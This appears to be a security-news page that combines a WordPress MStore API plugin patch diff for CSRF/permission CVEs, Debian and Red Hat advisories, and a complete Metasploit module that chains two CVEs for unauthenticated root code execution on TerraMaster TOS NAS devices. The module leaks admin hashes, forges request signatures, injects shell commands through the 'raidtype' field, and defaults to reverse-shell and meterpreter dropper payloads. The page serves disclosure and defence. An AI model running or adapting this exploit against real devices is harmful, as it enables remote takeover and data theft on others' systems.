The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_message function. This makes it possible for unauthenticated attackers to update new order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-3200: mstore-api.php in mstore-api/trunk – WordPress Plugin Repository

The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**mstore-api/trunk/assets/js/mstore-inspireui.js**

r2610824

r2925048

 

22

22

    $(document).on('blur', '.mstore-update-limit-product', function () {

23

23

        var limit = $(this).val();

 

24

        var nonce = $(this).data('nonce');

24

25

        $.ajax({

25

26

            type: 'post',

…

…

 

27

28

            data: {

28

29

                action: 'mstore\_update\_limit\_product',

29

 

                limit: limit

 

30

                limit: limit,

 

31

                nonce: nonce

30

32

            },

31

33

            success: function (result) {

…

…

 

39

41

    $(document).on('blur', '.mstore-update-firebase-server-key', function () {

40

42

        var serverKey = $(this).val();

 

43

        var nonce = $(this).data('nonce');

41

44

        $.ajax({

42

45

            type: 'post',

…

…

 

44

47

            data: {

45

48

                action: 'mstore\_update\_firebase\_server\_key',

46

 

                serverKey: serverKey

 

49

                serverKey: serverKey,

 

50

                nonce: nonce

47

51

            },

48

52

            success: function (result) {

…

…

 

56

60

    $(document).on('blur', '.mstore-update-new-order-title', function () {

57

61

        var title = $(this).val();

 

62

        var nonce = $(this).data('nonce');

58

63

        $.ajax({

59

64

            type: 'post',

…

…

 

61

66

            data: {

62

67

                action: 'mstore\_update\_new\_order\_title',

63

 

                title: title

 

68

                title: title,

 

69

                nonce: nonce

64

70

            },

65

71

            success: function (result) {

…

…

 

73

79

    $(document).on('blur', '.mstore-update-new-order-message', function () {

74

80

        var message = $(this).val();

 

81

        var nonce = $(this).data('nonce');

75

82

        $.ajax({

76

83

            type: 'post',

…

…

 

78

85

            data: {

79

86

                action: 'mstore\_update\_new\_order\_message',

80

 

                message: message

 

87

                message: message,

 

88

                nonce: nonce

81

89

            },

82

90

            success: function (result) {

…

…

 

90

98

    $(document).on('blur', '.mstore-update-status-order-title', function () {

91

99

        var title = $(this).val();

 

100

        var nonce = $(this).data('nonce');

92

101

        $.ajax({

93

102

            type: 'post',

…

…

 

95

104

            data: {

96

105

                action: 'mstore\_update\_status\_order\_title',

97

 

                title: title

 

106

                title: title,

 

107

                nonce: nonce

98

108

            },

99

109

            success: function (result) {

…

…

 

107

117

    $(document).on('blur', '.mstore-update-status-order-message', function () {

108

118

        var message = $(this).val();

 

119

        var nonce = $(this).data('nonce');

109

120

        $.ajax({

110

121

            type: 'post',

…

…

 

112

123

            data: {

113

124

                action: 'mstore\_update\_status\_order\_message',

114

 

                message: message

 

125

                message: message,

 

126

                nonce: nonce

115

127

            },

116

128

            success: function (result) {

**mstore-api/trunk/controllers/flutter-booking.php**

r2924554

r2925048

 

188

188

        global $wpdb;

189

189

        $table\_name = $wpdb->prefix . "wc\_appointment\_relationships";

190

 

        $items = $wpdb->get\_results("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

190

        $sql = $wpdb->prepare("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

191

        $items = $wpdb->get\_results($sql);

191

192

        foreach ($items as $item) {

192

193

            $user = get\_user\_by("ID", $item->staff\_id);

**mstore-api/trunk/controllers/flutter-wholesale.php**

r2924554

r2925048

 

75

75

        $role = $params\["role"\];

76

76

       

77

 

        if (isset($role) && in\_array($role, \['administrator','owner'\], true)) {

 

77

        if (!class\_exists('WooCommerceWholeSalePrices')) {

 

78

            return parent::sendError("invalid\_plugin", "You need to install WooCommerce Wholesale Prices plugin to use this api", 404);

 

79

        }

 

80

        global $wc\_wholesale\_prices;

 

81

        $data =  $wc\_wholesale\_prices->wwp\_wholesale\_roles->getAllRegisteredWholesaleRoles();

 

82

        $roles = \[\];

 

83

        $roles = array\_keys($data);

 

84

        $roles\[\] = 'subscriber';

 

85

        if (!isset($role) || !in\_array($role,$roles, true)) {

78

86

            return parent::sendError("invalid\_role", "Role is invalid.", 400);

79

87

        }

**mstore-api/trunk/mstore-api.php**

r2924554

r2925048

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.6

 

6

 \* Version: 3.9.7

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

41

41

class MstoreCheckOut

42

42

{

43

 

    public $version = '3.9.6';

 

43

    public $version = '3.9.7';

44

44

45

45

    public function \_\_construct()

…

…

 

213

213

214

214

    function mstore\_delete\_json\_file(){

215

 

        if(current\_user\_can( 'edit\_posts' )){

 

215

        if(checkIsAdmin(get\_current\_user\_id())){

216

216

            $id = sanitize\_text\_field($\_REQUEST\['id'\]);

217

217

            $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

218

218

            FlutterUtils::delete\_config\_file($id, $nonce);

 

219

        }else{

 

220

            wp\_send\_json\_error('No Permission',401);

219

221

        }

220

222

    }

…

…

 

222

224

    function mstore\_update\_limit\_product()

223

225

    {

224

 

        if(current\_user\_can( 'edit\_posts' )){

 

226

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

227

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_limit\_product')){

225

228

            $limit = sanitize\_text\_field($\_REQUEST\['limit'\]);

226

229

            if (is\_numeric($limit)) {

227

230

                update\_option("mstore\_limit\_product", intval($limit));

228

231

            }

 

232

        }else{

 

233

            wp\_send\_json\_error('No Permission',401);

229

234

        }

230

235

    }

…

…

 

232

237

    function mstore\_update\_firebase\_server\_key()

233

238

    {

234

 

        if(current\_user\_can( 'edit\_posts' )){

 

239

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

240

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_firebase\_server\_key')){

235

241

            $serverKey = sanitize\_text\_field($\_REQUEST\['serverKey'\]);

236

242

            update\_option("mstore\_firebase\_server\_key", $serverKey);

 

243

        }else{

 

244

            wp\_send\_json\_error('No Permission',401);

237

245

        }

238

246

    }

…

…

 

240

248

    function mstore\_update\_new\_order\_title()

241

249

    {

242

 

        if(current\_user\_can( 'edit\_posts' )){

 

250

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

251

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_title')){

243

252

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

244

253

            update\_option("mstore\_new\_order\_title", $title);

 

254

        }else{

 

255

            wp\_send\_json\_error('No Permission',401);

245

256

        }

246

257

    }

…

…

 

248

259

    function mstore\_update\_new\_order\_message()

249

260

    {

250

 

        if(current\_user\_can( 'edit\_posts' )){

 

261

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

262

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_message')){

251

263

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

252

264

            update\_option("mstore\_new\_order\_message", $message);

 

265

        }else{

 

266

            wp\_send\_json\_error('No Permission',401);

253

267

        }

254

268

    }

…

…

 

256

270

    function mstore\_update\_status\_order\_title()

257

271

    {

258

 

        if(current\_user\_can( 'edit\_posts' )){

 

272

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

273

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_title')){

259

274

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

260

275

            update\_option("mstore\_status\_order\_title", $title);

 

276

        }else{

 

277

            wp\_send\_json\_error('No Permission',401);

261

278

        }

262

279

    }

…

…

 

264

281

    function mstore\_update\_status\_order\_message()

265

282

    {

266

 

        if(current\_user\_can( 'edit\_posts' )){

 

283

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

284

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_message')){

267

285

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

268

286

            update\_option("mstore\_status\_order\_message", $message);

 

287

        }else{

 

288

            wp\_send\_json\_error('No Permission',401);

269

289

        }

270

290

    }

**mstore-api/trunk/readme.txt**

r2924554

r2925048

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.6

 

6

Stable tag:        3.9.7

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.7 =

 

47

  \* Fix security issues

 

48

46

49

\= 3.9.6 =

47

50

  \* Fix security issues

**mstore-api/trunk/templates/admin/mstore-api-admin-dashboard.php**

r2924554

r2925048

 

74

74

        ?>

75

75

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

76

 

            <input type="number" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

 

76

            <input type="number" data-nonce="<?php echo wp\_create\_nonce('update\_limit\_product'); ?>" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

77

77

                   class="mstore-update-limit-product">

78

78

        </div>

…

…

 

88

88

        ?>

89

89

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

90

 

            <textarea class="mstore-update-firebase-server-key mstore\_input"

 

90

            <textarea data-nonce="<?php echo wp\_create\_nonce('update\_firebase\_server\_key'); ?>" class="mstore-update-firebase-server-key mstore\_input"

91

91

                      style="height: 120px"><?php echo esc\_attr($serverKey) ?></textarea>

92

92

        </div>

…

…

 

108

108

        ?>

109

109

        <div class="form-group" style="margin-top:10px;">

110

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($newOrderTitle); ?>"

 

110

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_title'); ?>" value="<?php echo esc\_attr($newOrderTitle); ?>"

111

111

                   class="mstore-update-new-order-title mstore\_input">

112

112

        </div>

113

113

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

114

 

            <textarea placeholder="Message" class="mstore-update-new-order-message mstore\_input"

 

114

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_message'); ?>" class="mstore-update-new-order-message mstore\_input"

115

115

                      style="height: 120px"><?php echo esc\_attr($newOrderMsg); ?></textarea>

116

116

        </div>

…

…

 

132

132

        ?>

133

133

        <div class="form-group" style="margin-top:10px;">

134

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($statusOrderTitle); ?>"

 

134

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_title'); ?>" value="<?php echo esc\_attr($statusOrderTitle); ?>"

135

135

                   class="mstore-update-status-order-title mstore\_input">

136

136

        </div>

137

137

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

138

 

            <textarea placeholder="Message" class="mstore-update-status-order-message mstore\_input"

 

138

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_message'); ?>" class="mstore-update-status-order-message mstore\_input"

139

139

                      style="height: 120px"><?php echo esc\_attr($statusOrderMsg); ?></textarea>

140

140

        </div>

CVE-2023-3201: Changeset 2925048 for mstore-api – WordPress Plugin Repository

This Metasploit module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS versions 4.2.29 and below by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information" and CVE-2022-24989, "Authenticated remote code execution". Exploiting vulnerable endpoint api.php?mobile/webNasIPS leaking sensitive information such as admin password hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint api.php?mobile/createRaid with POST parameters raidtype and diskstring to execute remote code as root on TerraMaster NAS devices.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'digest/md5'require 'time'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TerraMaster TOS 4.2.29 or lower - Unauthenticated RCE chaining CVE-2022-24990 and CVE-2022-24989',        'Description' => %q{          This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29          and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"          and CVE-2022-24989, "Authenticated remote code execution".          Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password          hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint          `api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root          on TerraMaster NAS devices.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Octagon Networks', # Discovery          '0xf4n9x' # POC        ],        'References' => [          ['CVE', '2022-24990'],          ['CVE', '2022-24989'],          ['URL', 'https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/'],          ['URL', 'https://github.com/0xf4n9x/CVE-2022-24990'],          ['URL', 'https://attackerkb.com/topics/h8YKVKx21t/cve-2022-24990']        ],        'DisclosureDate' => '2022-03-07',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8181,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])    ])  end  def get_data    # Initialise variable data to store the leaked data    @data = {}    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`    # CVE-2022-24990    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),      'headers' => {        'User-Agent' => 'TNAS'      }    })    if res && res.code == 200 && res.body.include?('webNasIPS successful')      # Parse the JSON response and get the data such as admin password hash and MAC address      res_json = res.get_json_document      unless res_json.blank?        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip        @data['key'] = @data['mac'][6..11] # last three MAC address entries        @data['timestamp'] = Time.new.to_i.to_s        # derive signature        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])      end    end  end  def tos_encrypt_str(key, str_to_encrypt)    id = key + str_to_encrypt    return Digest::MD5.hexdigest(id.encode('utf-8'))  end  def execute_command(cmd, _opts = {})    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`    # CVE-2022-24989    diskstring = Rex::Text.rand_text_alpha_upper(4..8)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'User-Agent' => 'TNAS',        'Authorization' => @data['password'],        'Signature' => @data['signature'],        'Timestamp' => @data['timestamp']      },      'vars_post' => {        'raidtype' => ';' + cmd,        'diskstring' => diskstring.to_s      }    })  end  def get_terramaster_info    # get Terramaster CPU architecture (X64 or ARM64) and TOS version    @terramaster = {}    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')    })    if res && res.body && res.code == 200      # get the version information from the request response like below:      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>      return if res.body.match(/ver=.+?"/).nil?      version = res.body.match(/ver=.+?"/)[0]      # check if architecture is ARM64 or X64      if version.match(/_A/)        @terramaster['cpu_arch'] = 'ARM64'      elsif version.match(/_S/) || version.match(/_Q/)        @terramaster['cpu_arch'] = 'X64'      else        @terramaster['cpu_arch'] = 'UNKNOWN'      end      # strip TOS version number and remove trailing double quote.      @terramaster['tos_version'] = version.split('.0_')[1].chop    end  end  def check    get_terramaster_info    return CheckCode::Safe if @terramaster.empty?    if Rex::Version.new(@terramaster['tos_version']) <= Rex::Version.new('4.2.29')      return CheckCode::Vulnerable("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")    end    CheckCode::Safe("TOS version is #{@terramaster['tos_version']} and CPU architecture is #{@terramaster['cpu_arch']}.")  end  def exploit    get_data    fail_with(Failure::BadConfig, 'Can not retrieve the leaked data.') if @data.empty?    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager(linemax: 65536)    end  endend

TerraMaster TOS 4.2.29 Remote Code Execution

Debian Linux Security Advisory 5425-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5425-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php8.2CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the stable distribution (bookworm), this problem has been fixed inversion 8.2.7-1~deb12u1.We recommend that you upgrade your php8.2 packages.For the detailed security status of php8.2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php8.2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIy9sACgkQEMKTtsN8TjbZKxAAkxlsoOX/Gqfw5W0hKEFjJ0CYIxk4ghwg1N+o4e9Ko7BoVIFnFeVB4dTes0DIbGpp8nBpsh5ynQ6iZePQyD3qI0BTS9TCEAuzVQTq9gcWW6m2I9YxSlWDv2uhHTuwFv/V0Qa+j57v1Rbp2boF/D/Mygi3A4ctFI5KveFejSPuPYSlZTijFjWMD0jL8ledgP3Gzu4p/c+tHwapkgBsFj2LmyHVAodnTm0YngYEd82j78Ez2qoyUVyNBfSfv0YcFBDEb+WTzZ6jCZTOTtMGtEknH3/G+DMr4P3/zzpp6iWYe/SlPI2tmeqY6/hGi8VBiKt1SSdlRKjkmLPR+FZy0GrDuuFU6xrrxLtlGpyaoXE5scF+yqbHgRJAIrPg+7THWQd9vYJDu5ZaBh/hsFvMRqsIGksGp9J5jqUjoEcpBuafrjrvYcKA2hyqvQLseUCZUXk/ZG9Osp0sZ2B29RQ3naTgE38kuyZ3V8ae+zlwdJRcewr5XVvPcTlDnLiIL/c9sH203fHe1iFwevNERrU9gdxYxqllsWL4CaOZW6M4Yfb5+Dd4ilmUkDr5US2wnuU57QbQHu9LSR1Sjav710gATpNL2JfyC+SlGgD96u6Zz4Cxo2alEpF/rW8jBg4gnbyWePRjTVuIadeopR67nwVhOJooz85oVN+NuN1WpGdJxYhhUNs=0RKf-----END PGP SIGNATURE-----

Debian Security Advisory 5425-1

Debian Linux Security Advisory 5424-1 - It was discovered that PHP's implementation of SOAP HTTP Digest authentication performed insufficient error validation, which may result in a stack information leak or use of weak randomness.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5424-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 13, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : php7.4CVE ID         : not yet availableIt was discovered that PHP's implementation of SOAP HTTP Digestauthentication performed insufficient error validation, which may resultin a stack information leak or use of weak randomness.For the oldstable distribution (bullseye), this problem has been fixedin version 7.4.33-1+deb11u4.We recommend that you upgrade your php7.4 packages.For the detailed security status of php7.4 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/php7.4Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSIyvIACgkQEMKTtsN8TjYdURAAmtKmyN+UIZIfOHkrg4DxpNL2dwSBcUefcozb5CYvo8R0RQJt62Ce+aI+nP6UXn0GCTzepfzJPGHS93t4BPNvxIQmp8jlofkRX1/Lnrg3ndPPtop+eQhmwdOq65app3kj/sa7b6sZKbsgbvayHu5eo1pRO0DCFIdHamDVcW1RFzJSCNOpsk6L9LjFqvOss5I8WXzL3z2TVGb20rv5LG78/nfPNgLIr63faG7XA2hQgCkT1iIlY8qT1IOTyKHxMWEnDFxZnnHWOFV3DF8iPF8EjmBKDAaEWWwOeIkk5Kiu4Jj8RayC0Gs6KPA0OI0NJ1ejdvGDa1SbJOqvtX5QHzc+jqqrpKlmtc2zHLezH9YZW802jkMOvxI65zepbYRXMsIqmDi624v5eJQh6qytl9YeLAsoJZfHw6Ic4RmpYfE/bsibX+y98TnKbDeUbkAOtG7m6kDobYQ8FXiY/dGK0jWLkcMCbU9lP4onL7s3SshJJEKgeyE17av2LUSJrPszxcD6wKbUj8hchn0t6AKtAKPMk8YHPS5mnUVd2jkNzgAmu7PrWgtoK94dfby1SB62HN129+6GMO67VQhEHQjgsbubnYRYq92+qKpZ0bvq7Oq54G9XYcRzsoGCXkBhQnoqei8PSSKchWEd887q4sFxUmZYgqSN9xtNJSzOX/lv07bYNHM=4iUa-----END PGP SIGNATURE-----

Debian Security Advisory 5424-1

Red Hat Security Advisory 2023-3495-01 - Logging Subsystem 5.7.2 - Red Hat OpenShift. Issues addressed include cross site scripting and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.7.2 - Red Hat OpenShift security update  
Advisory ID:       RHSA-2023:3495-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3495  
Issue date:        2023-06-12  
CVE Names:         CVE-2021-26341 CVE-2021-33655 CVE-2021-33656  
                   CVE-2022-1462 CVE-2022-1679 CVE-2022-1789  
                   CVE-2022-2196 CVE-2022-2663 CVE-2022-3028  
                   CVE-2022-3239 CVE-2022-3522 CVE-2022-3524  
                   CVE-2022-3564 CVE-2022-3566 CVE-2022-3567  
                   CVE-2022-3619 CVE-2022-3623 CVE-2022-3625  
                   CVE-2022-3627 CVE-2022-3628 CVE-2022-3707  
                   CVE-2022-3970 CVE-2022-4129 CVE-2022-20141  
                   CVE-2022-25147 CVE-2022-25265 CVE-2022-30594  
                   CVE-2022-36227 CVE-2022-39188 CVE-2022-39189  
                   CVE-2022-41218 CVE-2022-41674 CVE-2022-41723  
                   CVE-2022-42703 CVE-2022-42720 CVE-2022-42721  
                   CVE-2022-42722 CVE-2022-43750 CVE-2022-47929  
                   CVE-2023-0394 CVE-2023-0461 CVE-2023-1195  
                   CVE-2023-1582 CVE-2023-2491 CVE-2023-22490  
                   CVE-2023-23454 CVE-2023-23946 CVE-2023-25652  
                   CVE-2023-25815 CVE-2023-27535 CVE-2023-27539  
                   CVE-2023-28120 CVE-2023-29007  
====================================================================  
1. Summary:

Logging Subsystem 5.7.2 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.7.2 - Red Hat OpenShift

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* rubygem-rack: denial of service in header parsing (CVE-2023-27539)

* rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice  
(CVE-2023-28120)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2179637 - CVE-2023-28120 rubygem-activesupport: Possible XSS in SafeBuffer#bytesplice  
2179649 - CVE-2023-27539 rubygem-rack: denial of service in header parsing

5. JIRA issues fixed (https://issues.redhat.com/):

LOG-3314 - [fluentd] The passphrase can not be enabled when forwarding logs to Kafka  
LOG-3316 - openshift-logging namespace can not be deleted directly when use lokistack as default store.  
LOG-3330 - run.sh shows incorrect chunk_limit_size if changed.  
LOG-3445 - [vector to loki]  validation is not disabled  when tls.insecureSkipVerify=true  
LOG-3749 - Unability to configure nodePlacement and toleration for logging-view-plugin  
LOG-3784 - [fluentd http] the defaut value HTTP content type application/x-ndjson is unsupported on datadog  
LOG-3827 - [fluentd http] The passphase isn't generated in fluent.conf  
LOG-3878 - [vector] PHP multiline errors are collected line by line when detectMultilineErrors is enabled.  
LOG-3945 - [Vector] Collector pods in CrashLoopBackOff when ClusterLogForwarder pipeline has space in between the pipeline name.  
LOG-3997 - Add http to log_forwarder_output_info metrics  
LOG-4011 - [Vector] Collector not complying with the custom tlsSecurityProfile configuration.  
LOG-4019 - [release-5.7] fluentd multiline exception plugin fails to detect JS client exception  
LOG-4049 - [release-5.7] User can list labels and label values for all user workload namespaces via Loki Label APIs  
LOG-4052 - [release-5.7] Fix Loki timeouts querying logs from OCP Console  
LOG-4098 - [release-5.7] No log_forwarder_output_info for splunk and google logging  
LOG-4151 - Fluentd fix  missing nil check for rotated_tw in update_watcher  
LOG-4163 - [release-5.7] TLS configuration for multiple Kafka brokers is not created in Vector  
LOG-4185 - Resources, tolerations and nodeSelector for the collector are missing  
LOG-4218 - Vector fails to run when configuring syslog forwarding for audit log  
LOG-4219 - Vector handles journal log as container log when enabling syslog forwarding. It breaks the compatibility with Fluentd  
LOG-4220 - [RHOCP4.11] Logs of POD which doesn't have labels specified by structuredTypeKey are parsed to JSON, and forwarded to app-xxxxxx  
LOG-4221 - [release-5.7] Fluentd wrongly closes a log file due to hash collision

6. References:

https://access.redhat.com/security/cve/CVE-2021-26341  
https://access.redhat.com/security/cve/CVE-2021-33655  
https://access.redhat.com/security/cve/CVE-2021-33656  
https://access.redhat.com/security/cve/CVE-2022-1462  
https://access.redhat.com/security/cve/CVE-2022-1679  
https://access.redhat.com/security/cve/CVE-2022-1789  
https://access.redhat.com/security/cve/CVE-2022-2196  
https://access.redhat.com/security/cve/CVE-2022-2663  
https://access.redhat.com/security/cve/CVE-2022-3028  
https://access.redhat.com/security/cve/CVE-2022-3239  
https://access.redhat.com/security/cve/CVE-2022-3522  
https://access.redhat.com/security/cve/CVE-2022-3524  
https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-3566  
https://access.redhat.com/security/cve/CVE-2022-3567  
https://access.redhat.com/security/cve/CVE-2022-3619  
https://access.redhat.com/security/cve/CVE-2022-3623  
https://access.redhat.com/security/cve/CVE-2022-3625  
https://access.redhat.com/security/cve/CVE-2022-3627  
https://access.redhat.com/security/cve/CVE-2022-3628  
https://access.redhat.com/security/cve/CVE-2022-3707  
https://access.redhat.com/security/cve/CVE-2022-3970  
https://access.redhat.com/security/cve/CVE-2022-4129  
https://access.redhat.com/security/cve/CVE-2022-20141  
https://access.redhat.com/security/cve/CVE-2022-25147  
https://access.redhat.com/security/cve/CVE-2022-25265  
https://access.redhat.com/security/cve/CVE-2022-30594  
https://access.redhat.com/security/cve/CVE-2022-36227  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-39189  
https://access.redhat.com/security/cve/CVE-2022-41218  
https://access.redhat.com/security/cve/CVE-2022-41674  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/cve/CVE-2022-42720  
https://access.redhat.com/security/cve/CVE-2022-42721  
https://access.redhat.com/security/cve/CVE-2022-42722  
https://access.redhat.com/security/cve/CVE-2022-43750  
https://access.redhat.com/security/cve/CVE-2022-47929  
https://access.redhat.com/security/cve/CVE-2023-0394  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-1195  
https://access.redhat.com/security/cve/CVE-2023-1582  
https://access.redhat.com/security/cve/CVE-2023-2491  
https://access.redhat.com/security/cve/CVE-2023-22490  
https://access.redhat.com/security/cve/CVE-2023-23454  
https://access.redhat.com/security/cve/CVE-2023-23946  
https://access.redhat.com/security/cve/CVE-2023-25652  
